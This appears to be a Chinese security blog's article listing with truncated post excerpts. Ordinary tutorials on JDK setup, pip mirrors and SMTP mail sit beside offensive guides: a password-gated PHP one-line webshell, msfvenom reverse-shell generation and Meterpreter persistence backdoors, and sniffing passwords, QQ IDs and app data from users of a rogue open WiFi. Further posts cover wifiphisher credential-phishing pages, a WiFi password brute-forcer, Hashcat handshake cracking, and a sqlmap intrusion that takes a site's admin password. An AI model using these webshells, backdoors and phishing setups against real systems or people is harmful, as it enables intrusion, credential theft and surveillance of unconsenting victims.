建站VPS工具综合杂谈

一句话木马短小精悍，而且功能强大，隐蔽性非常好，在入侵中始终扮演着强大的作用。 安装git clone https://github.com/tegal1337/Shelly cd Shelly pip install -r requirements.txt 安装模块 使用启动python3 shell.py生成一个shell python3 shell.py -g "kali" -p "88888" 分析代码<?php ($_GET['passwd'] == '888888') ? NULL : exit; system($_GET['c']); shell_exec($_GET['c']); ?>

持久化在msf生成的shell中，无论是是android还是windows在关闭软件或者设备重启后，我们的会话进程都会自然而然的关闭。要想得到会话，必须用户再次启动我们的shell才能得到会话。那么，我们该如何解决这一问题呢？ msf/Windows持久化1、metsvc：通过服务启动，是 Meterpreter 下的一个脚本； 运行 run metsvc 将会在目标主机上以 Meterpreter 的服务的形式注册在服务列表中，并开机自动自动； 运行 run metsvc -r 卸载目标主机上的 Meterpreter 服务； 原理：设置的后门在目标机启动后会自动开启一个服务，等待连接；这个有点正向代理的意思，自己开个端口等待接入控制； 优点：命令简单，不必设置太多参数，即不需要设置反弹到的主机IP、端口等，直接 run metsvc -A； 缺点：如何其他人知道服务器的ip，都可以利用这个后门开启的服务来控制服务器【扫描器发现】； 2、persistence：通过启动项启动，也是 Meterpreter 下的一个脚本； 移除后门：删除注册表中的值和上传的 VBScript 文件，具体位置执行脚本后有提示。 原理：有点反向代理的意思； 优点：由于是主动献殷勤，目标机器上的防火墙对于此等操作一般均会放行，后门的存活率较高； 环境介绍vps(msf端口)win10 (受害者) 生成shellmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.100 LPORT=4444…

关于msfconsolemsfconsole简称msf是一款常用的渗透测试工具，包含了常见的漏洞利用模块和生成各种木马。是出家旅行的必备神器，今天我们在一起来回顾下吧。 启动在终端执行 service postgresql start #启动postgresql 不启动也可以 msfconsole 常见的参数解读-p, –payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的 -l, –list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all -n, –nopsled < length> 为payload预先指定一个NOP滑动长度 -f, –format < format> 指定输出格式 (使用 –help-formats 来获取msf支持的输出格式列表) -e, –encoder [encoder] 指定需要使用的encoder（编码器）,指定需要使用的编码，如果既没用-e选项也没用-b选项，则输出raw payload -a, –arch < architecture> 指定payload的目标架构，例如x86 | x64 | x86_64 –platform < platform> 指定payload的目标平台 -s, –space < length> 设定有效攻击荷载的最大长度，就是文…

zfaka,免费、安全、稳定、高效的发卡系统Github项目地址:https://github.com/zlkbdotnet/zfaka 注意：本篇文章适合已安装zfaka平台。 增加payjs支付方式payjs是一款适用于个人收款的微信收款解决方案，以前尝试过申请微信支付，但是门槛比较高。但是通过payjs可以轻松的解决此问题。需要注意的是，payjs认证需要300元，但是不要但是，老司机会给你发优惠码。便宜下来也就200元。（需要上车的小伙伴，下方留言即可！）基本生意下来本基本上就赚回来啦！ 1.把附件Payjs下面的 三个文件夹payjs、payjswx、payjsalipay 上传到zfaka程序的`application\library\Pay 文件夹下。 附件 payjs下载 2.把tpl下面的文件 payjsalipay.html,payjswx.html 上传到application\modules\Admin\views\payment\tpl 下面 附件 tpl下载 3.登录服务器--登录数据库 mysql -u root -p use 数据库； INSERT INTO `t_payment` (`payment`, `payname`, `payimage`, `alias`, `sign_type`, `app_id`, `app_secret`, `ali_public_key`, `rsa_private_key`, `configure3`, `configure4`, `overtime`, `…

一、下载JDK1.首先需要下载java开发工具包JDK，下载地址：http://www.oracle.com/technetwork/java/javase/downloads/index.html 2.进行安装，本机为64位，所以安装了64位版本 注意：下载过程可能比较漫长，我们可以选择其他的源进行下载。 配置java环境在电脑桌面 右键点击 “此电脑”的“属性”选项--选择“高级系统设置”选项--点击下面的“环境变量”选项 点击“系统变量”下面的”新建“选项 在”变量名“处填上”Java_Home“ ”变量值“为JDK安装路径，笔者的路径是”D:\Program Files\Java\jdk1.8.0_91“ 点击”确定“选项 注意：jdk1.8.0_91为你的java版本，需要对应。 在”系统变量“中找到”Path“ 选择右边的“编辑文本”，将引号里面的全部复制“%Java_Home%\bin;%Java_Home%\jre\bin;”，到“变量值”栏的最前面，“确定” 在“系统变量”栏，“新建”，“变量名”为“CLASSPATH”，“变量值”为“.;%Java_Home%\bin;%Java_Home%\lib\dt.jar;%Java_Home%\lib\tools.jar”，“确定” 检验环境在cmd中输入java javac能看到java的相关命令。则说明安装成功。 安装esplise 到esplise的官网下载安装即可。 汉化安装eclipse2019之后，在官网下载对应的语言包： https://www.eclip…

说明：本项目是基于NodeMCU 和百度天工组合，搭建的实时监测室内温度和湿度项目。 首先我们看看效果怎么样 在线demo 硬件准备NodeMCU（esp8266开放版）DHC11杜邦线 云平台注册1，访问百度天工注册账号，如果有百度账号直接登录即可。2，在左侧「产品服务」-「物联网服务」中，选择「物接入」3，点项目名称可进入到项目详情页面，点击「新建物模型」。填写「名称」、「添加属性」。这里的属性就是我们需要采集的上报的信息，所以这里我加了两个属性：D1_Temperature 温度 number类型 D1_Humidity 湿度 number类型 4 创建完物模型，接下来创建物影子。名称自定义即可，这个在后面会用到。来自的物模型选择刚才创建的模型，点击创建即可完成。创建完成后，获取连接信息备用（连接信息中，key 是仅在生成后显示一次的）这里建议将配置信息下载。 5 购买实时数据库（用来储存温度和湿度的数据）点击时序数据库 TSDB配置即可，完成后付费即可（2元/一月） 到此，百度云的配置到此结束。 给板子刷入固件工具百度物联网固件软件ESP8266Flasher ESPEasy 百度天工适配版 刷入固件 连线VCC（+、3.3v） DATA（D4） GND（-、G ） 配置刷完系统，打开电脑 WiFi 列表，可以看到 ESP_Easy_0 作为无线热点出现了，而且是加密（密码是configesp），连接它。如果没发现，请重启 NodeMCU。 连上后，请在浏览器尝试打开 192.168.4.1，会跳转到设置页面。 选择…

Python的学习过程中，往往会学习到很多库，而安装各类库的时候，往往不尽人意，下载速度从几KB到十几KB。甚至下载到一半还超时报错。这都是因为pip源是访问国外的官方源，如果需要把源改成国内源如：阿里源、网易源等，需要做如下设置。1）打开我的电脑。2）在我的电脑上的地址栏输入：%appdata%，然后回车。 3) 在这里面新建一个文件夹 pip4) 在pip文件夹里面新建一个文件叫做 pip.ini ,内容写如下即可。 [global] timeout = 6000 index-url = https://mirrors.aliyun.com/pypi/simple/ trusted-host = mirrors.aliyun.com测试下，舒服飞起来。 Linux下的配置cd ~ mkdir ~/.pip vi ~/.pip/pip.conf编辑内容，和windows一模一样即可。 hi 这是一个信封

使用SMTP发送邮件#-*- coding: UTF-8 -*- import smtplib from email.mime.text import MIMEText from email.header import Header msg_from = '[email protected]' #发送方邮箱 passwd = 'xxxx' #填入发送方邮箱的授权码(填入自己的授权码，相当于邮箱密码) msg_to = ['[email protected]'] #收件人邮箱 subject = "新年快乐！" #主题 content = "我是邮件的内容，祝你新年快乐。" msg = MIMEText(content) #放入邮件主题 msg['Subject'] = subject msg['From'] = msg_from try: #通过ssl方式发送，服务器地址，端口 s = smtplib.SMTP_SSL("smtp.163.com", 465) #登录到邮箱 s.login(msg_from, passwd) #发送邮件：发送方，收件方，要发送的消息 s.sendmail(msg_from, msg_to, msg.as_string()) print('成功') except s.SMTPException as e: print(e) finally: s.quit()效果如下

什么是SEO,所谓seo优化就是让百度，360，搜狗,等搜索引擎收录你的破站。也许你会说，搞那个干吗，反正我的网站百度迟早会收录的。但是SEO可以使你的网站更快的让搜索引擎收录，以及在搜索引擎中的排名。 首先我们先看看本站的数据吧 这里以百度为例，说说常见的SEO的几个数据 主动推送：最为快速的提交方式，建议您将站点当天新产出链接立即通过此方式推送给百度，以保证新链接可以及时被百度收录。 sitemap：您可以定期将网站链接放到Sitemap中，然后将Sitemap提交给百度。百度会周期性的抓取检查您提交的Sitemap，对其中的链接进行处理，但收录速度慢于主动推送。 手工提交：如果您不想通过程序提交，那么可以采用此种方式，手动将链接提交给百度。 自动推送：是轻量级链接提交组件，将自动推送的JS代码放置在站点每一个页面源代码中，当页面被访问时，页面链接会自动推送给百度，有利于新页面更快被百度发现。 优化方法基于插件的优化：我们可以根据不同的平台，安装不同的seo插件。如：DZ，typecho,WP等常见的程序，下载相应的插件即可。 利用Python爬虫 我们可以利用下面代码对网站进行爬虫 import os import re import shutil REJECT_FILETYPE = 'rar,7z,css,js,jpg,jpeg,gif,bmp,png,swf,exe' def getinfo(webaddress): global REJECT_FILETYPE url = '…

我们在利用Hashcat破解密码的时候，总是由于我们设备的问题而焦头烂额。显卡太垃圾，破解一个密码需要几年，我们该如何解决这种尴尬呢？今天我们来看看Hashcat的分布式破解吧！ 官方参数如下：-S, --slow-candidates Enable slower (but advanced) candidate generators | 启用较慢（但高级）的候选生成器 --brain-server Enable brain server | 启用BRAIN服务器 -z, --brain-client Enable brain client, activates -S | 启用大脑客户端，激活-s --brain-client-features Define brain client features, see below | 定义大脑客户端功能，见下文 --brain-host Brain server host (IP or domain) | BRAIN服务器主机（IP或域） --brain-port Brain server port | …

首先我们先搭建一个AP,没加密的那种、能联网的那种。 。搭建方法比较多，可以参考我们以前的教程。这里不在多说。 对目标浏览网站图片的窃取在kali下，我们利用Driftnet即可！ 执行命令： driftnet -i wlan0 对目标账号和密码的分析需要注意的是，这种方法只对http协议的网站有效。 我们筛选所有的post数据包http.request.method == "POST" 对目标QQ号分析对于电脑QQ而言，很简单。我们只需要分析qicq协议即可得到目标的QQ号。但是对于手机QQ由于用的协议不同，故而不能利用此种方法。通过对数据包的分析，我们可以利用对QQ空间的访问信息，获取目标QQ。 输入uin=进行报文筛选 对快手信息分析用同样的方式，我们利用关键词user_id进行报文筛选。 得到了下面一条信息 http://apissl.ksapisrv.com/rest/n/user/settings?mod=Xiaomi%28MI%208%20SE%29&appver=6.8.1.10783&isp=CTCC&lon=104.929677&language=zh-cn&sys=ANDROID_9&max_memory=256&ud=666153773&egid=DFP1556DD2EE54045D41BA2E3C68BEC77456F8373E79C118B684EC17B6FE6F18&oc=XIAOMI&sh=2244&net=…

法律声明本文的宗旨是让更多的人了解身边的WiFi安全和WiFi安全爱好者学习研究，而非提供恶意教学。造成的法律后果请自行承担，与本站和作者无关。特此声明！！！！！ 环境说明apache+php7.3+mysqlkali2019.43070无线网卡html页面 配置web服务器首先将整个站点上传到/var/www/html下。 配置config.php<?php $dbhost = 'localhost'; // mysql服务器主机地址 $dbuser = 'root'; // mysql用户名 $dbpass = 'root'; // mysql用户名密码 ?>注意： 在配置此文件之前，请先配置好你的数据库。数据库密码为你初始化设置的密码。 如果对数据库的配置有问题的，请参考文章 kali自带mysql配置 kali是自带mysql服务，今天我们来看看，如何配置mysql。启动myslqservice mysql sta... 安装站点首先我们启动apache和mysql service apache2 start service mysql start这里为了使安装成功，我们利用mysql -u root -p登录数据库，检测账号和密码的准确性。 在浏览器访问http://kali的ip/install.php 提示如下：证明安装成功！ 如果提示下面错误： Connection failed: Access denied for user 'ro…

关于HashcatHashcat是什么呢？Hashcat是当前最强大的开源密码恢复工具，你可以访问Hashcat.net网站来了解这款工具的详细情况。本质上，Hashcat 3.0是一款高级密码恢复工具，可以利用CPU或GPU资源来攻击160多种哈希类型的密码 准备hashcat(5.1）kali自带cap数据包字典一份（为了节约时间 就不演示枚举了） cap文件转化为hccap格式aircrack-ng <out.cap> -J <out.hccap> 需要注意的是：此种方法转换的数据包只适应比较早的hashcat,新版的已经废弃。 如下：我么转换时会提示下面错误！ 解决方法： 到https://hashcat.net/cap2hccapx/上传我们的数据包 转换后的数据包格式为.hccapx 开始破解hashcat -m 2500 xxx.hccapx dics.txt参数说明： xxx.hccapx（转换的数据包）dics.txt （字典） 但是运行上面命令后，又会报错。 Device #1: Not a native Intel OpenCL runtime. Expect massive speed loss. You can use --force to override, but do not report related errors. …

前言在kali下我们来搭建web系统环境，在平时我们可在win系列的系统上用Phpstudys等集成环境来搭建，快捷 方便。今天来看看如何在kali下搭建环境。此中安装方法也适应Debian系列的系统。 注意：如果是虚拟机安装的kali 系统已经默认安装。直接用就行了，不需要安装。 安装Apacheapt-get install apache2启动Apacheservice apache2 start验证在浏览器访问kali的ip地址，出现下面的页面证明Apache安装成功。 安装PHP7.3apt-get install php7.3 libapache2-mod-php7.3 php7.3-mysql php7.3-curl php7.3-json php7.3-cgi php7.3-gd其中 php7.3-cgi 、php7.3-gd为相应的PHP模块，如果你的程序需要其他模块的支持，执行apt-get install php7.3-需安装的模块即可。 填坑：笔者在安装过程中，在安装完成PHP后，但是不能解析。通过分析是没有安装libapache2-mod-php7.3 如果不能解析PHP的，请执行apt-get install libapache2-mod-php7.3 即可。 验证是否安装执行命令php -v 这样 我们的PHP就安装完成了。 PS: 查看安装的模块php -m 探针验证我们新建一个php文件 内容如下： <?php phpinfo(); ?>访问探针 安装数据库apt-get in…

前言在一个风高夜黑的晚上，我深深的抽了一口烟。看了看窗外匆匆的行人，正在感叹生活的不易。突然我的企鹅di~di~的响了起来。定眼一看我去还是个女的。发来了一个链接…… 好奇心害死猫 顺手就点开了链接。 但是提示404错误。嗯……狠狠地抽口了烟，陷入了沉思！ 既然是短连接，那就还原，看看原来的网址。 前期的信息收集拿出神器nmap扫一波看看。 可见，开启了我们常见的80、888,、3306、8080、8888等端口，我们访问888和8888发现是宝塔面板 扫描网站目录： 找到了后台目录 admin以及安装目录install 网站cms查询 得到了apache等相关的信息，并未得到相关的cms信息。 漏洞扫描启动Acunetix丢进目录 扫一波 扫到了SQL注入漏洞和XSS漏洞 关于这两个漏洞的利用，在前面的教程中已经提到了很多次，这里不再啰嗦。 提起sqlmap来一波。 先到存在sql注入的页面看看，嗯哼……是个查询页面。Burp搞起！ 利用sqlmap注入 获取管理员密码 登录后台 拿Shell 由于后台没有上传点，上传也就没法搞，还有一种情况就是如果知道网站的绝对路劲。我们可以利用sqlmap拿下shell。 对代码的审计通过观察，这个网站就是一个探针程序。通过分享的连接诱导别人点击。从而获取对方的ip地址和gps信息。感觉挺好玩的！ 于是在GitHub在爬了下来送给大家。 附件下载 但是在安装过程中提示如下： 提示未授权，OK我们对代码进行审计 这里有这么一行 function check_authoriz…

本文申明 本文的主旨是，让身边的人更加了解WiFi安全问题，而非而已的攻击他人。因本文具有一定的攻击行为，若您阅读后请务必准守国家相关网络安全法规。若由于您的行为造成他人损失的，责任自负。本站、本文不承担任何法律责任。若您同意请接着往下阅读，否则请您离开阅读其他文章。感谢支持！！！ 原理示意图 设备清单树莓派（笔记本也可以）无线网卡（两个，只要kali支持的就行）钓鱼页面（文末下载） 拉取开源项目 git clone https://github.com/wifiphisher/wifiphisher.git cd wifiphisher sudo python setup.py install安装错误解决方案 在安装过程中，失败的最重要因素是网络问题，所以在安装过程中请保证网络良好。部分依赖下载失败，请挂乳酸菌或者更换国内的源。 钓鱼页面在文末下载钓鱼页面，放到wifiphisher/data/phishing-pages/oauth-login并替换。 在终端执行下面命令： wifiphisher --essid "FREE WI-FI" -p oauth-loginps: --essid :WiFi信号 视频演示 当用户输入账号等信息后，我们在后台即可得到账号和面。 附件下载 附件下载 解压密码： 查看文章隐藏内容或点我查看

前期的准备树莓派4b16G U盘 读卡器kali2019.4镜像网线一根 老夫的树莓派 树莓派正面 组装树莓派需要注意树莓派风扇的连线，脚针如下图： 组装后的效果： 开始刷入系统在 https://www.offensive-security.com/kali-linux-arm-images/ 中，找到RaspberryPi Foundation，根据自己的需要下载镜像 插入内存卡，写入镜像。 点亮你的树莓派将写好的内存卡装载到树莓派中，插入电源！插入网线！由于我没有买屏幕（主要是贵）。我们用ssh连接树莓派。 登录路由器，查看树莓派的ip地址！ 打开Xshell连接树莓派。 需要注意的是： 主机名：kali的ip地址 用户名：root 密码：toor 如下：成功连接 配置vnc由于没有屏幕，我们可以按照vnc进行远程桌面。 apt-get install tightvncserver注意：kali2019.4是默认安装的 配置tightvncserver 在终端输入tightvncserver 会提示输入密码，我们输入我们的密码（需要注意的是，这个密码是vnc连接的密码。） 连接vnc主机名：ip:1 用户名：root 密码：刚才自己输入的密码 注意ip后面必须填写:1 下载vnc软件，进行连接。手机效果！ 启动命令为 vncserver :1 设置中文在命令行输入”dpkg-reconfigure locales”。 进入图形化界面之后，（空格是选择，Tab是切换，*是选中），选中en_US.UTF-8和zh_CN.U…

网站基本信息收集网站域名、子域名收集域名解析ip查询网站所有人（whois）负责人联系方式网站基于那个CMS搭建 1x01 网站域名子域名收集这里，我们以本站一级域名bbskali.cn为例，简单看看网站子域名信息的收集。这里介绍几个kali中自带的子域名查询工具。 利用dnsmap查询子域名！ dnsmap bbskali.cn 利用fierce查询子域名 fierce -dns bbskali.cn 子域名收集的意义： 假设，我们的主站bbskali.cn通过测试，没有任何可下手的地方。但是我们可以通过旁站的漏洞拿下主站。 ip地址查询查询ip的意义： 通过ip地址，我们可以知道目前的站点开启了哪些端口，以及系统等信息。 方式一：利用ping查询 如，我们要查询www.baidu.com解析到哪个ip地址，执行命令： ping baidu.com当然这种方法针对开启了防PING和加了CDN的域名是无效的。 针对CND域名，我们可以利用国外的VPS去ping，因为大多数站长仅开启了国内的加速。 利用获取到的ip地址，我们利用Nmap扫一波，即可得到当前开启的端口。 whois查找这里，我们可以利用站长工具获取当前站长的相关信息。当然也可以在kali中直接执行whois命令直接获取。 whois baidu.com cms查询方式一：利用云悉查询 方式二：利用kali工具whatweb查询 whatweb 目标 网站目录爬虫通过对网站目录扫描，我们可以得到一些很重要的信息，比如网站的登录后台。 利用dirsearch扫描网站目录 执行命…

视频演示 环境准备python2.7Kali 2019.4无线网卡弱口令字典 安装模块pip install pywifi注：没有没有安装pip先安装pip 安装命令： apt-get install python-pip部分代码解读： 导入模块 from pywifi import * import time import sys def main(): #扫描时常 scantimes = 3 #单个密码测试延迟 testtimes = 15 output = sys.stdout #结果文件保存路径 files = "TestRes.txt" #字典列表 keys = open(sys.argv[1],"r").readlines() print "|KEYS %s"%(len(keys)) #实例化一个pywifi对象 wifi = PyWiFi() #选择定一个网卡并赋值于iface iface = wifi.interfaces()[0] #通过iface进行一个时常为scantimes的扫描并获取附近的热点基础配置 scanres = scans(iface,scantimes) #统计附近被发现的热点数量 nums = len(scanres) print "|SCAN GET %s"%(nums) print "%s\n%-*s| %-*s| %-*s| %-*s…

题记当今社会，网络技术飞速发展。但是面临的信息安全问题越来越突出，信息泄露、个人的隐私被曝光、聊天记录被监听等等。通常我们会在各种平台上看到一些类似于阅后即焚效果的网站。很大程度上保护了我们的隐私，但是真真的是阅后即焚吗？比如 你发的朋友圈，在删除了这条朋友圈，你确定在服务器上真实删除了吗？结果就不为人知了？ 利用kali安装阅后即焚，实现真正意义的保护个人隐私。 首先启动apacher 和mysql service apache2 start service mysql start由于kali是默认安装了apacher mysql php7.3我们就跳过具体的安装过程了！ 配置mysql kali自带mysql配置 kali是自带mysql服务，今天我们来看看，如何配置mysql。启动myslqservice mysql sta... 根据上诉文章，配置好mysql的登录账号。登录mysql创建数据库！mysql -u root -p #登录数据库 create database yue; #创建了一个名为yue的数据库 show databases; #显示当前创建的数据库 复制源码下载源码 ，复制到/var/www/html 对文件进行解压 unzip PasteBurn.zip 将解压的文件复制到根目录 修改配置文件config.php 域名这里我们填写kali的ip地址 安装在浏览器中执行 http://kali ip/install.php即可完成安装！ 但是，我们这样搭建后，只能通过内网设备…

首先来看看GURB的效果 登录界面的效果 如何修改修改gurb boot进入kali，切换到文件目录cd//boot/grub/themes/kali/分别修改grub-4x3.png和grub-16x9.png这两个图片即可。注意图片格式为png大小像素不能发生变化。 修改登录背景修改文件/usr/share/backgrounds/kali/下的kali-light-16x9.png和kali-light-4x3.png即可。其他的根据分辨率自行修改。 PS:在修改的过程中，一定要注意图片的分辨率问题，这里建议将原图拖动到ps中，做覆盖处理即可，注意图片的格式为png。

前期的准备kali linux(2019.4)VM15(文末提供下载地址)牛X的电脑（推荐配置 i7处理器 16G内存 1T硬盘 最好将kali安装在固态盘中） 准备好这些东西，我们就可以愉快的玩耍了！ 首先我们到kali官网下载最新版的kaliImage NameTorrentVersionKali Linux 64-BitTorrent2019.4Kali Linux 32-BitTorrent2019.4对于下载，不少的小伙伴说下载慢。这很正常，毕竟是国外的服务器。笔者这里是电信网络下载速度最高5M五分钟就下载完成了。 vm安装kali01 启动虚拟机，点击新建虚拟机——自定义 02在兼容性我们尽量选高一点，这里我们选15.x。 03 选择稍后安装系统（也可以直接选定第二个安装程序的iso的位置） 04 因为kali是基于Debian深度开发的，这里我们选Linux下的debian系列 05 设置虚拟机的名称和虚拟机的位置（不要讲虚拟机放到默认目录C盘，否则会占用20-40g的系统空间。） 06 设置处理器的数量（最少2核 树莓派可以1核 核数越高 处理能力越强） 07 设置内存 （2G起步） 08 网络设置 默认NAT 这时，我们基本设置完成，其余选择直接点击下一步完成即可。 09 点击刚才建立的虚拟机，设置镜像的文件位置。 10 启动虚拟机，点击 Graphical install(图形化安装) 11 选择语言 12 设置主机的名称 默认为kali 13 填写域名 （留空即可） 14 设置k…

Office 2019 Microsoft Office 2019于今年9月28日正式发布，不过仅支持WIN10系统，我想大家首先想知道的就是2019版增加了哪些新功能亮点，让我们先来一起看一下吧！ 亮点1：标签切换动画 Office 2019增加了很多界面特效动画，其中标签动画便是其中最吸引人的一个。每当我们点击一个Ribbon面板时，Office都会自动弹出一个动画特效。整体感觉很像是Win10特有的窗口淡入与淡出。从实际使用情况来看，新增加的过渡特效不仅没有对性能进行拖累，还给人了一种界面切换流畅的感觉，让人耳目一新。 标签切换动画 亮点2：内置IFS等新函数 Excel 2019内置了几款新函数，比如”IFS”多条件判断、”CONCAT”多列合并、“TEXTJOIN“多区域合并等等。以”IFS“举例，条件判断一般我们会选择IF，当条件多于两种时就需要多组IF函数进行嵌套。要是嵌套的层级过多，不仅书写上会有麻烦，后期排错也会相当繁琐。 相比之下，IFS则是将多个条件并列展示，语法结构类似于“IFS(条件1，结果，条件2，结果，条件3，结果，……)”，最多可支持127个不同条件，算得上是给IF函数开挂了! 亮点3：在线插入图标 制作PPT时我们常会使用一些图标，大多数图标结构简单、传达力强，却并不好找。最新版Office 2019则增加了在线图标插入功能，让我们可以像插入图片一样一键插入图标。从试用情况看，Office 2019的在线图标库还是蛮丰富的，分为“人物“、”技术与电子“、”通讯“、“商业”、“分析”、“商贸”、“教育”…

Swaks是一个功能强大，灵活，可编写脚本，面向事务的SMTP测试工具， 目前Swaks托管在私有svn存储库中。官方项目页面是http://jetmore.org/john/code/swaks/牛刀小试kali下默认自带，无需安装。 01 测试邮箱的连通性 swaks --to [email protected] 返回250ok，说明该邮箱存在，并且可以正常收信。 利用SMTP发送邮件 swaks --to 收件箱@qq.com --from 发件箱@163.com --body HI这是 由kali发送到您邮件中的内容 --header "Subject: kali论坛 致力于网络安全" --server smtp.163.com -p 25 -au 发件箱@163.com -ap SMTP密码在测试之前，在163官网开启smtp 命令说明： --from [email protected] //发件人邮箱； --ehlo qq.com //伪造邮件ehlo头，即是发件人邮箱的域名。提供身份认证 --body "http://www.baidu.com" //引号中的内容即为邮件正文； --header "Subject:hello" //邮件头信息，subject为邮件标题 --data ./Desktop/email.txt //将正常源邮件的内容保存成TXT文件，再作为正常邮件发送 发送附件 swaks --to 收件箱@qq.com --from 发件箱@163.com --body HI这是 由kali发送到您邮件中的内容 -…

首先我们来了解下什么是公网什么是内网。所谓外网就是广域网。广域网（英语：Wide Area Network，缩写为 WAN），又称外网、公网。是连接不同地区局域网或城域网计算机通信的远程网。内网就是局域网（Local Area Network，LAN）是指在某一区域内由多台计算机互联成的计算机组。如学校、医院、公安的网络。或者家庭中几台计算机组成的网络。而在实际情况中，外网一般有运营商提供服务，内网有一台路由器即可组建。比如你的手机和电脑在连接同一WiFi时，就处于同一局域网。现在我们来说说两者的区别！ 对于公网ip可以所有人访问，如淘宝的服务器。而内网ip只能在同一局域网内的设备访问，如同一WiFi下的手机可以访问电脑。 现在我们思考我们shell的问题？ 我们平时在利用msfvenom生成shell的时候，有这样一步 填写kali的ip地址和端口。 LHOST=192.168.232.195 LPORT=5555 这里的ip地址就是我们内网的ip。也就是只有我们内网的设备才能访问到192.168.232.195而外网的设备无法访问。那么我们该如何生成外网的shell呢？姿势一 调戏运营商客户获取公网ip此方法因地域成功率也不高，有的地方是绝对不可能给你的。如xj而东南沿海一般可以试试。通过和客户沟通，说你设备要绑定公网ip，各种调戏各种软磨硬泡或许会给你绑定。如果此方法不同，可以试试下面方法;故意将家中网络搞坏，叫人工报修。师傅会上门处理，这时给师傅一盒中华和师傅拉拉家常，会有意想不到的结果。因为报修师傅地位很低，通常是按处理的工单给…